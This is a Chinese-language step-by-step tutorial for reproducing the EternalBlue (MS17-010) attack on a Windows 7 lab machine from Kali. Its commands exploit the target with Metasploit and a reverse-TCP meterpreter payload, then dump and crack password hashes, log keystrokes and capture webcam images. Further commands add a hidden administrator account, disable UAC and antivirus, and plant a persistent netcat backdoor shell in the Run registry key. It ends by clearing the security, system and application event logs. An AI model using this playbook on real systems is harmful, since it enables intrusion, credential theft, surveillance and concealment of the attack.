永恒之蓝漏洞复现(ms17-010)----保姆级教程

攻击机: kali Linux             靶机： win7 x64   

提示:  复现攻击前请关闭杀毒软件

 

1.复现第一步按以下操作打开 445端口: 在 "运行" 里输入: regedit 打开注册表编辑器                                                                          2. 依次打开目录: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters

3. 在 Parameters 里有一个类型为 REG_DWORD 名字为 SmbDeviceEnabled 的的项                 

4. 右键点击修改，将它的16进制制改为1                                                                                             

 

 

 

 

 

2. 在靶机打开 ”控制面版----系统和安全----Windows Update(在它下面点击--查看已安装的更新)，打开后有很多补丁程序，找到用来防止永恒之蓝的补丁并卸载它。我这里是 ( KB4012212 和 KB4499175) 。我已经卸载。                                                                                                                                                                                       

 

 

3.  打开 “控制面版----系统和安全----Windows 防火墙----高级设置，在 "入站规则" 和 "出站规则" 分别启用以下规则。                                                                                                                               

 

 

 

 

4. 打开 ”网络和共享中心----更改高级共享设置，开启以下设置。                                                        

 

 

 

5. 在 kali 输入: nmap -T4 -A -v 192.168.189.181  #靶机ip地址---进行ip端口扫描，图2显示靶机445端口被打开，存在永恒之蓝漏洞。                                                                 

 

 

 

6. 打开 msfconsole 框架                                                                                                                     

 

 

 

7. 输入 search ms17-010  查看永恒之蓝漏洞利用模块                                                                      

 

 

 

8.  输入 use auxiliary/scanner/smb/smb_ms17_010   该模块用于扫描，嗅探，指纹识别等相关功能。                                                                                                                                                    

 

 

 

9. 输入  show options   查看模块需要的配置参数                                                                                   

 

 

 

10. 输入  set rhosts 192.168.189.181   设置攻击目标和目标和445端口号                                                                                                                      

 

 

11. 再次输入  show options    查看配置参数                                                                                               

 

 

 

12. 输入  run  执行扫描 ，显示主机容易被攻击                                                                                                                                                                                                          

 

 

13. 输入  use exploit/windows/smb/ms17_010_eternalblue   启动ms17-010 攻击模块                        

 

 

 

14. 输入 info  查看这个漏洞信息                                                                                                                 

 

 

 

15. 输入  show targets    显示该攻击模块针对哪些操作系统、版本有用(可攻击的平台)。                                            

 

 

 

16.  输入  show payloads    查看攻击载荷                                                                                              

 

 

 

17. 输入  payload/windows/x64/meterpreter/reverse_tcp   设置攻击载荷                                          

 

 

 

19.  输入 set rhosts 192.168.189.181、set rport 445  设置攻击目标ip和端口号                                                                             

 

 

 

20. 输入 set lhost 192.168.189.188、set lport 4444  设置监听主机ip和端口号（kali)                                 

 

 

 

 

21. 输入 show options  查看配置好的攻击机和靶机参数                                                           

 

 

 

22. 输入  run   执行攻击，攻击成功显示下图。成功后可以进行文件上传、获取截屏、获取密码、打开摄像头拍照、远程桌面链接、后门持久化等操作。                                                                                      

 

 

 

 

23.  渗透成功后后续阶段： 运行run 成功后，开启了一个reverse TCP 监听器来监听本地的4444端口( 攻击者的本地主机地址 lhost 和端口号 lport）。                        

@在meterpreter> 中可以使用以下命令来实现对目标的操作:   

(1).  sysinfo      查看目标主机系统信息                (2).  run  scraper    查看目标主机详细信息              (3).  hashdump       导出密码的哈希                      (4).  load  kiwi         加载                                      (5).  ps                    查看目标主机进程信息          (6).  pwd          查看目标主机当前目录(windows)    (7).  getlwd        查看目标主机当前目录(linux)         (8).  search  -f  *.jsp  -d  e:\        搜所E盘中以.jsp为后缀的文件                                                         (9).  download  e:\test.txt    /root   将目标的e:\test.txt 文件下载到/root 目录下                          (10). upload /root/test.txt d:\test      将/root/test.txt 上传到目标机器的 d:\test 目录下                     

(11).  PIDmigrate  1384      将当前Meterpreter Shell的进程迁移到PID为1384的进程上                 (12).  idletime      查看主机运行时间                    (13).  getuid         查看获取到的当前权限         (14).  getsystem      提权                                        (15).  run  killav       关闭杀毒软件                         (16).  screenshot      截图                                       (17).  webcam_list     查看目标主机的摄像头          (18).  webcam_snap      拍照                                 (19).  webcam_stream      开视频                    (20).  execute  参数  -f  可执行文件   执行可执行程序                                                                    (21).  run  getgui  -u  hack  -p  123                    创建hack用户，密码为123                                      (22).  run  getgui  -e    开启远程桌面链接       (23).  keyscan_start      开启键盘记录功能      (24).  keyscan_dump   显示捕捉到的键盘记录信息(25).  keyscan_stop     停止键盘记录功能          (26).  uictl  disable  keyboard    禁止目标使用键盘(27).  uictl  enable  keyboard     允许目标使用键盘 (28).  uictl  disable  mouse        禁止目标使用鼠标 (29).  uictl  enable   mouse        允许目标使用鼠标 (30).  load                                   使用扩展库        (31).  run                                      执行攻击           (32).  clearev                                清除日志            

 

 

 

24.   示例： 输入 sysinfo  查看目标主机系统                                                                                       

     

 

 

 

25. 示例：输入 ipconfig  查看主机ip                                                                                                  

 

 

 

26.  示例： 输入 getuid  查看用户身份(windows 系统权限)                                                                                                

 

 

 

27.   示例: 输入 shell  获得shell控制台                                                                                            

 

 

 

28.  想要从目标主机shell 退出到 meterpreter，输入 exit  退出shell。                                                 

 

 

 

29. 示例： 输入 screenshot  获取靶机截屏                                                                                             

 

 

 

 

30. 以下模块主要用于在获得目标主机系统远程控制权后，进行一系列后渗透攻击

(1).  run post/windows/manage/migrate      自动进程迁移                                                                (2).  run post/windows/gather/checkvm       查看靶机是否运行在虚拟机上                                        (3).  run post/windows/manage/killav          关闭杀毒软件                                                                 (4).  run post/windows/manage/enable_rdp        开启远程桌面服务                                                   (5).  run post/windows/manage/autoroute           查看路由信息                                                          (6). run post/windows/gather/enum_logged_on_users     列举当前登录的用户                                         (7).  run post/windows/gather/enum_applications       列举应用程序                                                       (8).  run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码                           (9).  run windows/gather/smart_hashdump        dump出所由用户的hash

 

 

 

31. 示例： 输入  hashdump 或 run windows/gather/smart_hashdump    获取用户密码                                       

 

 

32.  将得到的哈希码放到MD5在线破解上解密得到明文密码                                                                  

 

 

 

33.  输入  shell  进入shell控制台                                                                                                             

 

 

34.  输入   net user hackk 123456 add    在靶机上创建一个名为hackk的用户，密码为123456          

 

 

 

35. 输入  net  localgroup  administrators  hackk  /add    将hackk添加到Windows 7的本地管理员组中，以便获得更大的权限。                             

 

 

 

 

36. 输入  net  user    查看本地用户                                                                                                     

 

 

 

37. 输入  net  localgroup  administrators    查看本地管理员 ，可以看到hackk已被添加进管理员组中                                                                

 

 

 

38. 输入  run getgui -e  或  run post/windows/manage/enable_rdp    开启靶机远程桌面链接            

 

 

 

39.  在kali 输入  rdesktop  192.168.189.188   靶机ip地址，就可打开远程桌面                             

 

 

 

 

40.  输入  hashdump  查看用户密码                     

 

 

 

41. 输入  netsh firewall add portopening TCP 4444 "hackk"  ENABLE ALL    创建防火墙规则        

 

 

 

42. 输入  netsh firewall add portopening TCP 443  "hackk"  ENABLE ALL    新建一条防火墙规则，允许443端口访问网络                                                                   

 

 

 

43. 输入    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f                                          关闭UAC，以达到阻止未经用户授权的程序启动破坏系统                                                                  

 

 

 

44. 输入   cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f                                                                  开启默认共享，方便攻击者执行远程命令  

 

 

 

45. 在kali 输入  ls /usr/share/windows-binaries/nc.exe     查看nc反弹后门程序在kali里的路径                                     

 

 

 

46. 输入  upload /usr/share/windows-binaries/nc.exe  C:\\Windows                              上传nc到靶机C盘windows文件夹中，打开靶机可以看到从kali上传到win7的nc程序     

                                                                                                                                             

 

 

 

47. 输入  reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\Windows\nc.exe -Ldp 443 -e cmd.exe'                                           当靶机开机后，允许443端口访问网络。(用于连接nc的端口)                                                                                                                            

 

 

 

48. 输入  run  post/windows/manage/enable_rdp                    开启目标远程桌面链接 ，然后在kali输入 

rdesktop 192.168.189.188                                    (靶机ip) 链接远程桌面，并重启靶机                                           

 

 

 

49. 在kali 输入  nc -v 192.168.189.188 443       就可以通过nc连接靶机进入控制台

   

 

 

 

50.  向反弹到kali的靶机控制台输入   wevtutil cl security     清除登录日志                                                  

 

 

 

52.  向反弹到kali的靶机控制台输入   wevtutil cl system     清除系统日志              

 

 

 

53.  向反弹到kali的靶机控制台输入  wevtutil cl application  清除应用程序日志  

 

 

 

55. 靶机日制被清空，渗透完成